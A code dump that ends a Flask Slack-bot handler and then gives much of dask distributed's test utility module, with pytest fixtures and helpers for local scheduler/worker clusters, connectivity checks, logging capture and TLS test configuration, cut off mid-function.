# If our bot hears things that are not events we've subscribed to,
# send a quirky but helpful error response
return make_response("[NO EVENT IN SLACK REQUEST] These are not the droids\
you're looking for.", 404, {"X-Slack-No-Retry": 1})
if __name__ == '__main__':
app.run(debug=True, threaded=True)
|
utils_test.py
|
from __future__ import annotations
import asyncio
import concurrent.futures
import contextlib
import copy
import functools
import gc
import inspect
import io
import logging
import logging.config
import multiprocessing
import os
import re
import signal
import socket
import subprocess
import sys
import tempfile
import threading
import weakref
from collections import defaultdict
from collections.abc import Callable
from contextlib import contextmanager, nullcontext, suppress
from itertools import count
from time import sleep
from typing import Any, Literal
from distributed.compatibility import MACOS
from distributed.scheduler import Scheduler
try:
import ssl
except ImportError:
ssl = None # type: ignore
import pytest
import yaml
from tlz import assoc, memoize, merge
from tornado import gen
from tornado.ioloop import IOLoop
import dask
from distributed import system
from distributed import versions as version_module
from distributed.client import Client, _global_clients, default_client
from distributed.comm import Comm
from distributed.comm.tcp import TCP, BaseTCPConnector
from distributed.compatibility import WINDOWS
from distributed.config import initialize_logging
from distributed.core import CommClosedError, ConnectionPool, Status, connect, rpc
from distributed.deploy import SpecCluster
from distributed.diagnostics.plugin import WorkerPlugin
from distributed.metrics import time
from distributed.nanny import Nanny
from distributed.node import ServerNode
from distributed.proctitle import enable_proctitle_on_children
from distributed.security import Security
from distributed.utils import (
DequeHandler,
TimeoutError,
_offload_executor,
get_ip,
get_ipv6,
iscoroutinefunction,
log_errors,
mp_context,
reset_logger_locks,
sync,
)
from distributed.worker import Worker
try:
import dask.array # register config
except ImportError:
pass
logger = logging.getLogger(__name__)
logging_levels = {
name: logger.level
for name, logger in logging.root.manager.loggerDict.items()
if isinstance(logger, logging.Logger)
}
_TEST_TIMEOUT = 30
_offload_executor.submit(lambda: None).result() # create thread during import
@pytest.fixture(scope="session")
def valid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("print('hello world!')")
return local_file
@pytest.fixture(scope="session")
def client_contract_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("distributed_script.py")
lines = (
"from distributed import Client",
"e = Client('127.0.0.1:8989')",
"print(e)",
)
local_file.write("\n".join(lines))
return local_file
@pytest.fixture(scope="session")
def invalid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("a+1")
return local_file
async def cleanup_global_workers():
for worker in Worker._instances:
await worker.close(report=False, executor_wait=False)
@pytest.fixture
def loop():
with check_instances():
with pristine_loop() as loop:
# Monkey-patch IOLoop.start to wait for loop stop
orig_start = loop.start
is_stopped = threading.Event()
is_stopped.set()
def start():
is_stopped.clear()
try:
orig_start()
finally:
is_stopped.set()
loop.start = start
yield loop
# Stop the loop in case it's still running
try:
sync(loop, cleanup_global_workers, callback_timeout=0.500)
loop.add_callback(loop.stop)
except RuntimeError as e:
if not re.match("IOLoop is clos(ed|ing)", str(e)):
raise
except TimeoutError:
pass
else:
is_stopped.wait()
@pytest.fixture
def loop_in_thread():
with pristine_loop() as loop:
thread = threading.Thread(target=loop.start, name="test IOLoop")
thread.daemon = True
thread.start()
loop_started = threading.Event()
loop.add_callback(loop_started.set)
loop_started.wait()
yield loop
loop.add_callback(loop.stop)
thread.join(timeout=5)
@pytest.fixture
def zmq_ctx():
import zmq
ctx = zmq.Context.instance()
yield ctx
ctx.destroy(linger=0)
@contextmanager
def pristine_loop():
IOLoop.clear_instance()
IOLoop.clear_current()
loop = IOLoop()
loop.make_current()
assert IOLoop.current() is loop
try:
yield loop
finally:
try:
loop.close(all_fds=True)
except (KeyError, ValueError):
pass
IOLoop.clear_instance()
IOLoop.clear_current()
original_config = copy.deepcopy(dask.config.config)
def reset_config():
dask.config.config.clear()
dask.config.config.update(copy.deepcopy(original_config))
def nodebug(func):
"""
A decorator to disable debug facilities during timing-sensitive tests.
Warning: this doesn't affect already created IOLoops.
"""
@functools.wraps(func)
def wrapped(*args, **kwargs):
old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
try:
return func(*args, **kwargs)
finally:
if old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = old_asyncio_debug
return wrapped
def nodebug_setup_module(module):
"""
A setup_module() that you can install in a test module to disable
debug facilities.
"""
module._old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if module._old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
def nodebug_teardown_module(module):
"""
A teardown_module() that you can install in a test module to reenable
debug facilities.
"""
if module._old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = module._old_asyncio_debug
def inc(x):
return x + 1
def dec(x):
return x - 1
def mul(x, y):
return x * y
def div(x, y):
return x / y
def deep(n):
if n > 0:
return deep(n - 1)
else:
return True
def throws(x):
raise RuntimeError("hello!")
def double(x):
return x * 2
def slowinc(x, delay=0.02):
sleep(delay)
return x + 1
def slowdec(x, delay=0.02):
sleep(delay)
return x - 1
def slowdouble(x, delay=0.02):
sleep(delay)
return 2 * x
def randominc(x, scale=1):
from random import random
sleep(random() * scale)
return x + 1
def slowadd(x, y, delay=0.02):
sleep(delay)
return x + y
def slowsum(seq, delay=0.02):
sleep(delay)
return sum(seq)
def slowidentity(*args, **kwargs):
delay = kwargs.get("delay", 0.02)
sleep(delay)
if len(args) == 1:
return args[0]
else:
return args
class _UnhashableCallable:
# FIXME https://github.com/python/mypy/issues/4266
__hash__ = None # type: ignore
def __call__(self, x):
return x + 1
def run_for(duration, timer=time):
"""
Burn CPU for *duration* seconds.
"""
deadline = timer() + duration
while timer() <= deadline:
pass
# This dict grows at every varying() invocation
_varying_dict: defaultdict[str, int] = defaultdict(int)
_varying_key_gen = count()
class _ModuleSlot:
def __init__(self, modname, slotname):
self.modname = modname
self.slotname = slotname
def get(self):
return getattr(sys.modules[self.modname], self.slotname)
def varying(items):
"""
Return a function that returns a result (or raises an exception)
from *items* at each call.
"""
# cloudpickle would serialize the *values* of all globals
# used by *func* below, so we can't use `global <something>`.
# Instead look up the module by name to get the original namespace
# and not a copy.
slot = _ModuleSlot(__name__, "_varying_dict")
key = next(_varying_key_gen)
def func():
dct = slot.get()
i = dct[key]
if i == len(items):
raise IndexError
else:
x = items[i]
dct[key] = i + 1
if isinstance(x, Exception):
raise x
else:
return x
return func
def map_varying(itemslists):
"""
Like *varying*, but return the full specification for a map() call
on multiple items lists.
"""
def apply(func, *args, **kwargs):
return func(*args, **kwargs)
return apply, list(map(varying, itemslists))
async def geninc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
async def asyncinc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
_readone_queues: dict[Any, asyncio.Queue] = {}
async def readone(comm):
"""
Read one message at a time from a comm that reads lists of
messages.
"""
try:
q = _readone_queues[comm]
except KeyError:
q = _readone_queues[comm] = asyncio.Queue()
async def background_read():
while True:
try:
messages = await comm.read()
except CommClosedError:
break
for msg in messages:
q.put_nowait(msg)
q.put_nowait(None)
del _readone_queues[comm]
background_read()
msg = await q.get()
if msg is None:
raise CommClosedError
else:
return msg
def run_scheduler(q, nputs, config, port=0, **kwargs):
with dask.config.set(config):
from distributed import Scheduler
# On Python 2.7 and Unix, fork() is used to spawn child processes,
# so avoid inheriting the parent's IO loop.
with pristine_loop() as loop:
async def _():
try:
scheduler = await Scheduler(
validate=True, host="127.0.0.1", port=port, **kwargs
)
except Exception as exc:
for i in range(nputs):
q.put(exc)
else:
for i in range(nputs):
q.put(scheduler.address)
await scheduler.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_worker(q, scheduler_q, config, **kwargs):
with dask.config.set(config):
from distributed import Worker
reset_logger_locks()
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
pid = os.getpid()
try:
worker = await Worker(scheduler_addr, validate=True, **kwargs)
except Exception as exc:
q.put((pid, exc))
else:
q.put((pid, worker.address))
await worker.finished()
# Scheduler might've failed
if isinstance(scheduler_addr, str):
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_nanny(q, scheduler_q, config, **kwargs):
with dask.config.set(config):
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
pid = os.getpid()
try:
worker = await Nanny(scheduler_addr, validate=True, **kwargs)
except Exception as exc:
q.put((pid, exc))
else:
q.put((pid, worker.address))
await worker.finished()
# Scheduler might've failed
if isinstance(scheduler_addr, str):
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
@contextmanager
def check_active_rpc(loop, active_rpc_timeout=1):
active_before = set(rpc.active)
yield
# Some streams can take a bit of time to notice their peer
# has closed, and keep a coroutine (*) waiting for a CommClosedError
# before calling close_rpc() after a CommClosedError.
# This would happen especially if a non-localhost address is used,
# as Nanny does.
# (*) (example: gather_from_workers())
def fail():
pytest.fail(
"some RPCs left active by test: %s" % (set(rpc.active) - active_before)
)
async def wait():
await async_wait_for(
lambda: len(set(rpc.active) - active_before) == 0,
timeout=active_rpc_timeout,
fail_func=fail,
)
loop.run_sync(wait)
@pytest.fixture
def cluster_fixture(loop):
with cluster() as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def s(cluster_fixture):
scheduler, workers = cluster_fixture
return scheduler
@pytest.fixture
def a(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[0]
@pytest.fixture
def b(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[1]
@pytest.fixture
def client(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
# Compatibility. A lot of tests simply use `c` as fixture name
c = client
@pytest.fixture
def client_secondary(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
@contextmanager
def tls_cluster_context(
worker_kwargs=None, scheduler_kwargs=None, security=None, **kwargs
):
security = security or tls_only_security()
worker_kwargs = assoc(worker_kwargs or {}, "security", security)
scheduler_kwargs = assoc(scheduler_kwargs or {}, "security", security)
with cluster(
worker_kwargs=worker_kwargs, scheduler_kwargs=scheduler_kwargs, **kwargs
) as (s, workers):
yield s, workers
@pytest.fixture
def tls_cluster(loop, security):
with tls_cluster_context(security=security) as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def tls_client(tls_cluster, loop, security):
s, workers = tls_cluster
with Client(s["address"], security=security, loop=loop) as client:
yield client
@pytest.fixture
def security():
return tls_only_security()
def _terminate_join(proc):
proc.terminate()
proc.join()
proc.close()
def _close_queue(q):
q.close()
q.join_thread()
q._writer.close() # https://bugs.python.org/issue42752
class _SafeTemporaryDirectory(tempfile.TemporaryDirectory):
def __exit__(self, exc_type, exc_val, exc_tb):
try:
return super().__exit__(exc_type, exc_val, exc_tb)
except (PermissionError, NotADirectoryError):
# It appears that we either have a process still interacting with
# the tmpdirs of the workers or that win process are not releasing
# their lock in time. We are receiving PermissionErrors during
# teardown
# See also https://github.com/dask/distributed/pull/5825
pass
@contextmanager
def cluster(
nworkers=2,
nanny=False,
worker_kwargs={},
active_rpc_timeout=10,
disconnect_timeout=20,
scheduler_kwargs={},
config={},
):
ws = weakref.WeakSet()
enable_proctitle_on_children()
with clean(timeout=active_rpc_timeout, threads=False) as loop:
if nanny:
_run_worker = run_nanny
else:
_run_worker = run_worker
with contextlib.ExitStack() as stack:
# The scheduler queue will receive the scheduler's address
scheduler_q = mp_context.Queue()
stack.callback(_close_queue, scheduler_q)
# Launch scheduler
scheduler = mp_context.Process(
name="Dask cluster test: Scheduler",
target=run_scheduler,
args=(scheduler_q, nworkers + 1, config),
kwargs=scheduler_kwargs,
daemon=True,
)
ws.add(scheduler)
scheduler.start()
stack.callback(_terminate_join, scheduler)
# Launch workers
workers_by_pid = {}
q = mp_context.Queue()
stack.callback(_close_queue, q)
for _ in range(nworkers):
tmpdirname = stack.enter_context(
_SafeTemporaryDirectory(prefix="_dask_test_worker")
)
kwargs = merge(
{
"nthreads": 1,
"local_directory": tmpdirname,
"memory_limit": system.MEMORY_LIMIT,
},
worker_kwargs,
)
proc = mp_context.Process(
name="Dask cluster test: Worker",
target=_run_worker,
args=(q, scheduler_q, config),
kwargs=kwargs,
)
ws.add(proc)
proc.start()
stack.callback(_terminate_join, proc)
workers_by_pid[proc.pid] = {"proc": proc}
saddr_or_exception = scheduler_q.get()
if isinstance(saddr_or_exception, Exception):
raise saddr_or_exception
saddr = saddr_or_exception
for _ in range(nworkers):
pid, addr_or_exception = q.get()
if isinstance(addr_or_exception, Exception):
raise addr_or_exception
workers_by_pid[pid]["address"] = addr_or_exception
start = time()
try:
try:
security = scheduler_kwargs["security"]
rpc_kwargs = {
"connection_args": security.get_connection_args("client")
}
except KeyError:
rpc_kwargs = {}
async def wait_for_workers():
async with rpc(saddr, **rpc_kwargs) as s:
while True:
nthreads = await s.ncores()
if len(nthreads) == nworkers:
break
if time() - start > 5:
raise Exception("Timeout on cluster creation")
loop.run_sync(wait_for_workers)
# avoid sending processes down to function
yield {"address": saddr}, [
{"address": w["address"], "proc": weakref.ref(w["proc"])}
for w in workers_by_pid.values()
]
finally:
logger.debug("Closing out test cluster")
alive_workers = [
w["address"]
for w in workers_by_pid.values()
if w["proc"].is_alive()
]
loop.run_sync(
lambda: disconnect_all(
alive_workers,
timeout=disconnect_timeout,
rpc_kwargs=rpc_kwargs,
)
)
if scheduler.is_alive():
loop.run_sync(
lambda: disconnect(
saddr, timeout=disconnect_timeout, rpc_kwargs=rpc_kwargs
)
)
try:
client = default_client()
except ValueError:
pass
else:
client.close()
async def disconnect(addr, timeout=3, rpc_kwargs=None):
rpc_kwargs = rpc_kwargs or {}
async def do_disconnect():
with rpc(addr, **rpc_kwargs) as w:
# If the worker was killed hard (e.g. sigterm) during test runtime,
# we do not know at this point and may not be able to connect
with suppress(EnvironmentError, CommClosedError):
# Do not request a reply since comms will be closed by the
# worker before a reply can be made and we will always trigger
# the timeout
await w.terminate(reply=False)
await asyncio.wait_for(do_disconnect(), timeout=timeout)
async def disconnect_all(addresses, timeout=3, rpc_kwargs=None):
await asyncio.gather(*(disconnect(addr, timeout, rpc_kwargs) for addr in addresses))
def gen_test(timeout: float = _TEST_TIMEOUT) -> Callable[[Callable], Callable]:
"""Coroutine test
@pytest.mark.parametrize("param", [1, 2, 3])
@gen_test(timeout=5)
async def test_foo(param)
await ... # use tornado coroutines
@gen_test(timeout=5)
async def test_foo():
await ... # use tornado coroutines
"""
assert timeout, (
"timeout should always be set and it should be smaller than the global one from"
"pytest-timeout"
)
def _(func):
def test_func(*args, **kwargs):
with clean() as loop:
injected_func = functools.partial(func, *args, **kwargs)
if iscoroutinefunction(func):
cor = injected_func
else:
cor = gen.coroutine(injected_func)
loop.run_sync(cor, timeout=timeout)
# Patch the signature so pytest can inject fixtures
test_func.__signature__ = inspect.signature(func)
return test_func
return _
async def start_cluster(
nthreads: list[tuple[str, int] | tuple[str, int, dict]],
scheduler_addr: str,
loop: IOLoop,
security: Security | dict[str, Any] | None = None,
Worker: type[ServerNode] = Worker,
scheduler_kwargs: dict[str, Any] = {},
worker_kwargs: dict[str, Any] = {},
) -> tuple[Scheduler, list[ServerNode]]:
s = await Scheduler(
loop=loop,
validate=True,
security=security,
port=0,
host=scheduler_addr,
**scheduler_kwargs,
)
workers = [
Worker(
s.address,
nthreads=ncore[1],
name=i,
security=security,
loop=loop,
validate=True,
host=ncore[0],
**(
merge(worker_kwargs, ncore[2]) # type: ignore
if len(ncore) > 2
else worker_kwargs
),
)
for i, ncore in enumerate(nthreads)
]
await asyncio.gather(*workers)
start = time()
while (
len(s.workers) < len(nthreads)
or any(ws.status != Status.running for ws in s.workers.values())
or any(comm.comm is None for comm in s.stream_comms.values())
):
await asyncio.sleep(0.01)
if time() > start + 30:
await asyncio.gather(*(w.close(timeout=1) for w in workers))
await s.close(fast=True)
raise TimeoutError("Cluster creation timeout")
return s, workers
async def end_cluster(s, workers):
logger.debug("Closing out test cluster")
async def end_worker(w):
with suppress(TimeoutError, CommClosedError, EnvironmentError):
await w.close(report=False)
await asyncio.gather(*(end_worker(w) for w in workers))
await s.close() # wait until scheduler stops completely
s.stop()
def gen_cluster(
nthreads: list[tuple[str, int] | tuple[str, int, dict]] = [
("127.0.0.1", 1),
("127.0.0.1", 2),
],
scheduler="127.0.0.1",
timeout: float = _TEST_TIMEOUT,
security: Security | dict[str, Any] | None = None,
Worker: type[ServerNode] = Worker,
client: bool = False,
scheduler_kwargs: dict[str, Any] = {},
worker_kwargs: dict[str, Any] = {},
client_kwargs: dict[str, Any] = {},
active_rpc_timeout: float = 1,
config: dict[str, Any] = {},
clean_kwargs: dict[str, Any] = {},
allow_unclosed: bool = False,
cluster_dump_directory: str | Literal[False] = "test_cluster_dump",
) -> Callable[[Callable], Callable]:
from distributed import Client
""" Coroutine test with small cluster
@gen_cluster()
async def test_foo(scheduler, worker1, worker2):
await ... # use tornado coroutines
@pytest.mark.parametrize("param", [1, 2, 3])
@gen_cluster()
async def test_foo(scheduler, worker1, worker2, param):
await ... # use tornado coroutines
@gen_cluster()
async def test_foo(scheduler, worker1, worker2, pytest_fixture_a, pytest_fixture_b):
await ... # use tornado coroutines
See also:
start
end
"""
assert timeout, (
"timeout should always be set and it should be smaller than the global one from"
"pytest-timeout"
)
scheduler_kwargs = merge(
{"dashboard": False, "dashboard_address": ":0"}, scheduler_kwargs
)
worker_kwargs = merge(
{"memory_limit": system.MEMORY_LIMIT, "death_timeout": 15}, worker_kwargs
)
def _(func):
if not iscoroutinefunction(func):
raise RuntimeError("gen_cluster only works for coroutine functions.")
@functools.wraps(func)
def test_func(*outer_args, **kwargs):
result = None
workers = []
with clean(timeout=active_rpc_timeout, **clean_kwargs) as loop:
async def coro():
with dask.config.set(config):
s = False
for _ in range(60):
try:
s, ws = await start_cluster(
nthreads,
scheduler,
loop,
security=security,
Worker=Worker,
scheduler_kwargs=scheduler_kwargs,
worker_kwargs=worker_kwargs,
)
except Exception as e:
logger.error(
"Failed to start gen_cluster: "
f"{e.__class__.__name__}: {e}; retrying",
exc_info=True,
)
await asyncio.sleep(1)
else:
workers[:] = ws
args = [s] + workers
break
if s is False:
raise Exception("Could not start cluster")
if client:
c = await Client(
s.address,
loop=loop,
security=security,
asynchronous=True,
**client_kwargs,
)
args = [c] + args
try:
coro = func(*args, *outer_args, **kwargs)
task = asyncio.create_task(coro)
coro2 = asyncio.wait_for(asyncio.shield(task), timeout)
result = await coro2
if s.validate:
s.validate_state()
except asyncio.TimeoutError:
assert task
buffer = io.StringIO()
# This stack indicates where the coro/test is suspended
task.print_stack(file=buffer)
if cluster_dump_directory:
await dump_cluster_state(
s,
ws,
output_dir=cluster_dump_directory,
func_name=func.__name__,
)
task.cancel()
while not task.cancelled():
await asyncio.sleep(0.01)
# Remove as much of the traceback as possible; it's
# uninteresting boilerplate from utils_test and asyncio and
# not from the code being tested.
raise TimeoutError(
f"Test timeout after {timeout}s.\n"
"========== Test stack trace starts here ==========\n"
f"{buffer.getvalue()}"
) from None
except pytest.xfail.Exception:
raise
except Exception:
if cluster_dump_directory and not has_pytestmark(
test_func, "xfail"
):
await dump_cluster_state(
s,
ws,
output_dir=cluster_dump_directory,
func_name=func.__name__,
)
raise
finally:
if client and c.status not in ("closing", "closed"):
await c._close(fast=s.status == Status.closed)
await end_cluster(s, workers)
await asyncio.wait_for(cleanup_global_workers(), 1)
try:
c = await default_client()
except ValueError:
pass
else:
await c._close(fast=True)
def get_unclosed():
return [c for c in Comm._instances if not c.closed()] + [
c
for c in _global_clients.values()
if c.status != "closed"
]
try:
start = time()
while time() < start + 60:
gc.collect()
if not get_unclosed():
break
await asyncio.sleep(0.05)
else:
if allow_unclosed:
print(f"Unclosed Comms: {get_unclosed()}")
else:
raise RuntimeError("Unclosed Comms", get_unclosed())
finally:
Comm._instances.clear()
_global_clients.clear()
return result
result = loop.run_sync(
coro, timeout=timeout * 2 if timeout else timeout
)
for w in workers:
if getattr(w, "data", None):
try:
w.data.clear()
except OSError:
# zict backends can fail if their storage directory
# was already removed
pass
return result
# Patch the signature so pytest can inject fixtures
orig_sig = inspect.signature(func)
args = [None] * (1 + len(nthreads)) # scheduler, *workers
if client:
args.insert(0, None)
bound = orig_sig.bind_partial(*args)
test_func.__signature__ = orig_sig.replace(
parameters=[
p
for name, p in orig_sig.parameters.items()
if name not in bound.arguments
]
)
return test_func
return _
async def dump_cluster_state(
s: Scheduler, ws: list[ServerNode], output_dir: str, func_name: str
) -> None:
"""A variant of Client.dump_cluster_state, which does not rely on any of the below
to work:
- Having a client at all
- Client->Scheduler comms
- Scheduler->Worker comms (unless using Nannies)
"""
scheduler_info = s._to_dict()
workers_info: dict[str, Any]
versions_info = version_module.get_versions()
if not ws or isinstance(ws[0], Worker):
workers_info = {w.address: w._to_dict() for w in ws}
else:
workers_info = await s.broadcast(msg={"op": "dump_state"}, on_error="return")
workers_info = {
k: repr(v) if isinstance(v, Exception) else v
for k, v in workers_info.items()
}
state = {
"scheduler": scheduler_info,
"workers": workers_info,
"versions": versions_info,
}
os.makedirs(output_dir, exist_ok=True)
fname = os.path.join(output_dir, func_name) + ".yaml"
with open(fname, "w") as fh:
yaml.safe_dump(state, fh) # Automatically convert tuples to lists
print(f"Dumped cluster state to {fname}")
def raises(func, exc=Exception):
try:
func()
return False
except exc:
return True
def _terminate_process(proc):
if proc.poll() is None:
if sys.platform.startswith("win"):
proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
proc.send_signal(signal.SIGINT)
try:
proc.wait(30)
finally:
# Make sure we don't leave the process lingering around
with suppress(OSError):
proc.kill()
@contextmanager
def popen(args: list[str], flush_output: bool = True, **kwargs):
"""Start a shell command in a subprocess.
Yields a subprocess.Popen object.
stderr is redirected to stdout.
stdout is redirected to a pipe.
Parameters
----------
args: list[str]
Command line arguments
flush_output: bool, optional
If True (the default), the stdout/stderr pipe is emptied while it is being
filled. Set to False if you wish to read the output yourself. Note that setting
this to False and then failing to periodically read from the pipe may result in
a deadlock due to the pipe getting full.
kwargs: optional
optional arguments to subprocess.Popen
"""
kwargs["stdout"] = subprocess.PIPE
kwargs["stderr"] = subprocess.STDOUT
if sys.platform.startswith("win"):
# Allow using CTRL_C_EVENT / CTRL_BREAK_EVENT
kwargs["creationflags"] = subprocess.CREATE_NEW_PROCESS_GROUP
dump_stdout = False
args = list(args)
if sys.platform.startswith("win"):
args[0] = os.path.join(sys.prefix, "Scripts", args[0])
else:
args[0] = os.path.join(
os.environ.get("DESTDIR", "") + sys.prefix, "bin", args[0]
)
proc = subprocess.Popen(args, **kwargs)
if flush_output:
ex = concurrent.futures.ThreadPoolExecutor(1)
flush_future = ex.submit(proc.communicate)
try:
yield proc
# asyncio.CancelledError is raised by @gen_test/@gen_cluster timeout
except (Exception, asyncio.CancelledError):
dump_stdout = True
raise
finally:
try:
_terminate_process(proc)
finally:
# XXX Also dump stdout if return code != 0 ?
if flush_output:
out, err = flush_future.result()
ex.shutdown()
else:
out, err = proc.communicate()
assert not err
if dump_stdout:
print("\n" + "-" * 27 + " Subprocess stdout/stderr" + "-" * 27)
print(out.decode().rstrip())
print("-" * 80)
def wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail(f"condition not reached until {timeout} seconds")
async def async_wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
await asyncio.sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail(f"condition not reached until {timeout} seconds")
@memoize
def has_ipv6():
"""
Return whether IPv6 is locally functional. This doesn't guarantee IPv6
is properly configured outside of localhost.
"""
if os.getenv("DISABLE_IPV6") == "1":
return False
serv = cli = None
try:
serv = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
serv.bind(("::", 0))
serv.listen(5)
cli = socket.create_connection(serv.getsockname()[:2])
return True
except OSError:
return False
finally:
if cli is not None:
cli.close()
if serv is not None:
serv.close()
if has_ipv6():
def requires_ipv6(test_func):
return test_func
else:
requires_ipv6 = pytest.mark.skip("ipv6 required")
async def assert_can_connect(addr, timeout=0.5, **kwargs):
"""
Check that it is possible to connect to the distributed *addr*
within the given *timeout*.
"""
comm = await connect(addr, timeout=timeout, **kwargs)
comm.abort()
async def assert_cannot_connect(
addr, timeout=0.5, exception_class=EnvironmentError, **kwargs
):
"""
Check that it is impossible to connect to the distributed *addr*
within the given *timeout*.
"""
with pytest.raises(exception_class):
comm = await connect(addr, timeout=timeout, **kwargs)
comm.abort()
async def assert_can_connect_from_everywhere_4_6(port, protocol="tcp", **kwargs):
"""
Check that the local *port* is reachable from all IPv4 and IPv6 addresses.
"""
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs),
]
if has_ipv6():
futures += [
assert_can_connect("%s://[::1]:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_4(port, protocol="tcp", **kwargs):
"""
Check that the local *port* is reachable from all IPv4 addresses.
"""
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs),
]
if has_ipv6():
futures += [
assert_cannot_connect("%s://[::1]:%d" % (protocol, port), **kwargs),
assert_cannot_connect(
"%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs
),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_4(port, **kwargs):
"""
Check that the local *port* is only reachable from local IPv4 addresses.
"""
futures = [assert_can_connect("tcp://127.0.0.1:%d" % port, **kwargs)]
if get_ip() != "127.0.0.1": # No outside IPv4 connectivity?
futures += [assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs)]
if has_ipv6():
futures += [
assert_cannot_connect("tcp://[::1]:%d" % port, **kwargs),
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_6(port, **kwargs):
"""
Check that the local *port* is reachable from all IPv6 addresses.
"""
assert has_ipv6()
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs),
assert_can_connect("tcp://[::1]:%d" % port, **kwargs),
assert_can_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_6(port, **kwargs):
"""
Check that the local *port* is only reachable from local IPv6 addresses.
"""
assert has_ipv6()
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs),
assert_can_connect("tcp://[::1]:%d" % port, **kwargs),
]
if get_ipv6() != "::1": # No outside IPv6 connectivity?
futures += [
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs)
]
await asyncio.gather(*futures)
@contextmanager
def captured_logger(logger, level=logging.INFO, propagate=None):
"""Capture output from the given Logger."""
if isinstance(logger, str):
logger = logging.getLogger(logger)
orig_level = logger.level
orig_handlers = logger.handlers[:]
if propagate is not None:
orig_propagate = logger.propagate
logger.propagate = propagate
sio = io.StringIO()
logger.handlers[:] = [logging.StreamHandler(sio)]
logger.setLevel(level)
try:
yield sio
finally:
logger.handlers[:] = orig_handlers
logger.setLevel(orig_level)
if propagate is not None:
logger.propagate = orig_propagate
@contextmanager
def captured_handler(handler):
"""Capture output from the given logging.StreamHandler."""
assert isinstance(handler, logging.StreamHandler)
orig_stream = handler.stream
handler.stream = io.StringIO()
try:
yield handler.stream
finally:
handler.stream = orig_stream
@contextmanager
def new_config(new_config):
"""
Temporarily change configuration dictionary.
"""
from distributed.config import defaults
config = dask.config.config
orig_config = copy.deepcopy(config)
try:
config.clear()
config.update(copy.deepcopy(defaults))
dask.config.update(config, new_config)
initialize_logging(config)
yield
finally:
config.clear()
config.update(orig_config)
initialize_logging(config)
@contextmanager
def new_environment(changes):
saved_environ = os.environ.copy()
os.environ.update(changes)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
@contextmanager
def new_config_file(c):
"""
Temporarily change configuration file to match dictionary *c*.
"""
import yaml
old_file = os.environ.get("DASK_CONFIG")
fd, path = tempfile.mkstemp(prefix="dask-config")
try:
with os.fdopen(fd, "w") as f:
f.write(yaml.dump(c))
os.environ["DASK_CONFIG"] = path
try:
yield
finally:
if old_file:
os.environ["DASK_CONFIG"] = old_file
else:
del os.environ["DASK_CONFIG"]
finally:
os.remove(path)
certs_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "tests"))
def get_cert(filename):
"""
Get the path to one of the test TLS certificates.
"""
path = os.path.join(certs_dir, filename)
assert os.path.exists(path), path
return path
def tls_config():
"""
A functional TLS configuration with our test certs.
"""
ca_file = get_cert("tls-ca-cert.pem")
keycert = get_cert("tls-key-cert.pem")
return {
"distributed": {
"comm": {
"tls": {
"ca-file": ca_file,
"client": {"cert": keycert},
"scheduler": {"cert": keycert},
"worker": {"cert": keycert},
}
}
}
}
def tls_only_config():
"""
A functional TLS configuration with our test certs, disallowing
plain TCP communications.
"""
c = tls_config()
c["distributed"]["comm"]["require-encryption"] = True
return c
def tls_security():
"""
A Security object with proper TLS configuration.
"""
with new_config(tls_config()):
sec = Security()
return sec
def tls_only_security():
"""
A Security object with proper TLS configuration and disallowing plain
TCP communications.
"""
with new_config(tls_only_config()):
sec = Security()
assert sec.require_encryption
return sec
def get_server_ssl_context(
